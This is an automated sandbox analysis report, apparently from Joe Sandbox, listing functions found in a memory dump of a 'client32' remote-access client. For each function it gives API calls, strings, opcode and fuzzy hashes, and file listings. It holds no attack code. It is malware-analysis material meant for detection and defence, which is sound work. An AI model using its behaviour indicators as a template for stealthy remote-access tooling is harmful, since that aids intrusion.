String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
API String ID: 1734919802-1728070458
Opcode ID: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
Instruction ID: 447bd79fb7e316194c8fbcf3240c79f01d8f25fe8b238cd57140670aacafd43f
Opcode Fuzzy Hash: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
Instruction Fuzzy Hash: 7811C475D01319AFC720EFFA9DC09AAF7B8FF01319B40462EE56653540EA7095408B5A

Function 1110D060 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

std::exception::exception.LIBCMT ref: 1110D0CA
__CxxThrowException@8.LIBCMT ref: 1110D0DF
GetCurrentThreadId.KERNEL32 ref: 1110D0F6
InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003D0), ref: 1110D109
InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003D0), ref: 1110D118
EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
LeaveCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D1DF

Strings

..\ctl32\Refcount.cpp, xrefs: 1110D166
QueueThreadEvent, xrefs: 1110D16B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_memsetstd::exception::exceptionwsprintf
String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
API String ID: 144328431-1024648535
Opcode ID: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
Instruction ID: 09a7b7f2a39b786243c3074fc4a04aff0e2c3ee4e0c0e7a142bf3ec4b628a9f7
Opcode Fuzzy Hash: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
Instruction Fuzzy Hash: F941C075E01315ABDB12CFA98D84BAEFBE4FB88718F54852AE819D3244E731A5008B51

Function 11158220 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,CF3D35D0,?,00000000,00000001), ref: 11158267
CoCreateInstance.OLE32(111C06FC,00000000,00000017,111C062C,?), ref: 11158287
wsprintfW.USER32 ref: 111582A7
SysAllocString.OLEAUT32(?), ref: 111582B3
wsprintfW.USER32 ref: 11158367
SysFreeString.OLEAUT32(?), ref: 11158408

Strings

WQL, xrefs: 11158380
root\CIMV2, xrefs: 111582A1
SELECT * FROM %s, xrefs: 11158361

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
String ID: SELECT * FROM %s$WQL$root\CIMV2
API String ID: 3050498177-823534439
Opcode ID: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
Instruction ID: 5c9d69ea3c7034288904af0a1b42e56c7497ab7ebaebdabd712d66f14354dd8e
Opcode Fuzzy Hash: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
Instruction Fuzzy Hash: 3A517071B00219AFD7A0DB69CC94F9BF7B9FB8A714F1042A9E819D7251D630AE40CF51

Function 11112B00 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11112B55
CoCreateInstance.OLE32(111BBF3C,00000000,00000001,111BBF4C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104B1EB), ref: 11112B6F
LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11112B94
GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11112BA6
SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11112BB9
FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11112BC5
CoUninitialize.COMBASE(00000000), ref: 11112C61

Strings

SHELL32.DLL, xrefs: 11112B85
SHGetSettings, xrefs: 11112BA0

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
String ID: SHELL32.DLL$SHGetSettings
API String ID: 4195908086-2348320231
Opcode ID: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
Instruction ID: 68fa62bcea783be6e527966318309be417962e86cfe8c7ca8d2a125abe7bdbbc
Opcode Fuzzy Hash: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
Instruction Fuzzy Hash: 00515DB5A002169FDB04DFE5C9C4AEFFBB9FF88304F218569E615AB244D730A941CB61

Function 685A2F80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 685A2FBB
GetTickCount.KERNEL32 ref: 685A300D
InterlockedExchange.KERNEL32(?,00000000), ref: 685A301B
_calloc.LIBCMT ref: 685A303B
_memmove.LIBCMT ref: 685A3049
InterlockedDecrement.KERNEL32(?), ref: 685A307F
SetEvent.KERNEL32(000002F8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,97A234B3), ref: 685A308C

Part of subcall function 685A28D0: wsprintfA.USER32 ref: 685A2965

Strings

a3Zh, xrefs: 685A2F87, 685A2FEB, 685A3021, 685A2FEE, 685A3043, 685A305A, 685A3099
a3Zh, xrefs: 685A2FE0, 685A2FE3

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
String ID: a3Zh$a3Zh
API String ID: 3178096747-1469771974
Opcode ID: c3b386c5d1f3d419a61cc250ec1f38c9d0b35944b3ff5a5a76c454e13496c827
Instruction ID: 34c56f1df615941f22e7a00de43ead90c8a12db29b9b1b45dd867d994322e2e9
Opcode Fuzzy Hash: c3b386c5d1f3d419a61cc250ec1f38c9d0b35944b3ff5a5a76c454e13496c827
Instruction Fuzzy Hash: 104137B5D00209AFDB10DFA5D885AEFB7F8FF88304F408516E915E7240E7759A458BA1

Function 685B0D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,685B0F2B,6A918BCB,00000000,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D48
GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 685B0D5B
GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-685DCB4C,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D76
_malloc.LIBCMT ref: 685B0D8C

Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE

GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?), ref: 685B0D9F
_free.LIBCMT ref: 685B0D84

Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25

_free.LIBCMT ref: 685B0DAF

Strings

GetAdaptersAddresses, xrefs: 685B0D55
IPHLPAPI.DLL, xrefs: 685B0D41

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
String ID: GetAdaptersAddresses$IPHLPAPI.DLL
API String ID: 1360380336-1843585929
Opcode ID: 0793eb672395ac2a3c93fec248c92fd000900b9a54595b2b6bf680a5682af908
Instruction ID: 42ad6cadc272536a2ff2776ff80aeab67ed087ff2e94416cc8d5ca3a43c0c877
Opcode Fuzzy Hash: 0793eb672395ac2a3c93fec248c92fd000900b9a54595b2b6bf680a5682af908
Instruction Fuzzy Hash: 7501D4B5240341AFE6209B709D94F6B77ACAB50B00F50481DF9669B2C0EA71F840C724

Function 11141AB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 111419A0: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
Part of subcall function 111419A0: RegCloseKey.ADVAPI32(?), ref: 11141A74

_memset.LIBCMT ref: 11141AF5
GetVersionExA.KERNEL32(?), ref: 11141B0E
LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
FreeLibrary.KERNEL32(00000000), ref: 11141B5F
GetSystemDefaultLangID.KERNEL32 ref: 11141B6A

Strings

kernel32.dll, xrefs: 11141B20
GetUserDefaultUILanguage, xrefs: 11141B41

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
String ID: GetUserDefaultUILanguage$kernel32.dll
API String ID: 4251163631-545709139
Opcode ID: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
Instruction ID: b52f9434772b6d6e8d8038633bf4c77d33c7f8479cfcef56ad60021fb0ce4fde
Opcode Fuzzy Hash: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
Instruction Fuzzy Hash: BE31E331F006268BD7119FB5C984BAEF7B0EB05718FA04575E928C3680E7346985CB92

Function 110151F0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110152AA
_memset.LIBCMT ref: 110152EE
RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015328

Strings

SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101522B
%012d, xrefs: 110152A4
NSLSP, xrefs: 11015338
PackedCatalogItem, xrefs: 11015312

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_memsetwsprintf
String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
API String ID: 1333399081-1346142259
Opcode ID: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
Instruction ID: 40dd4717f0c7ad5754e433c7b85868c8d74bcde588045e86a78ebe46af68b9ce
Opcode Fuzzy Hash: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
Instruction Fuzzy Hash: 01418F75D022299EEB11DF50CC94BEEF7B4EB45318F0445E8E91AA7281EB34AB44CF51

Function 1100FF90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1100FFBD
std::_Lockit::_Lockit.LIBCPMT ref: 1100FFE0
std::bad_exception::bad_exception.LIBCMT ref: 11010064
__CxxThrowException@8.LIBCMT ref: 11010072
std::_Lockit::_Lockit.LIBCPMT ref: 11010085
std::locale::facet::_Facet_Register.LIBCPMT ref: 1101009F

Strings

bad cast, xrefs: 1101005C

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
Instruction ID: eb2297de3126562b7a6adfe99aab1db74979c6a8f9cac3cb144437a799ef2362
Opcode Fuzzy Hash: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
Instruction Fuzzy Hash: B631E635E002658FCB52CF94C880BAEF7B4FB0536CF404269E865AB298DB75AD00CB91

Function 685A6940 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 685A6950

Part of subcall function 685A7BE0: _memset.LIBCMT ref: 685A7BFF
Part of subcall function 685A7BE0: _strncpy.LIBCMT ref: 685A7C0B

Part of subcall function 6859A4E0: EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,6859DA7F,?,00000000), ref: 6859A503
Part of subcall function 6859A4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6859A568
Part of subcall function 6859A4E0: Sleep.KERNEL32(00000000,?,6859DA7F,?,00000000), ref: 6859A581
Part of subcall function 6859A4E0: LeaveCriticalSection.KERNEL32(685DB898,00000000), ref: 6859A5B3

Strings

BlZh, xrefs: 685A6B88
1.2, xrefs: 685A6998
Publish %d pending services, xrefs: 685A6AAF
Channel, xrefs: 685A6ADD
Client, xrefs: 685A6AE2

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
String ID: 1.2$BlZh$Channel$Client$Publish %d pending services
API String ID: 1112461860-429780693
Opcode ID: 4e352527ea774d9df39beab3d12507b1a7a3a11d5491ca3cd601c78d2979097a
Instruction ID: 5d3ed0157c170679b21c14aa78076d12a51ce1c935d438aa56610adfde399586
Opcode Fuzzy Hash: 4e352527ea774d9df39beab3d12507b1a7a3a11d5491ca3cd601c78d2979097a
Instruction Fuzzy Hash: AA51AD35A043498FEF10DB7CD894BAE7BE5AB46308F910129DE6193281EB31ED45CB99

Function 11141240 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\ctl32\util.cpp, xrefs: 11141267, 11141309
nsmdir < GP_MAX, xrefs: 1114126C
FALSE || !"wrong nsmdir", xrefs: 1114130E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

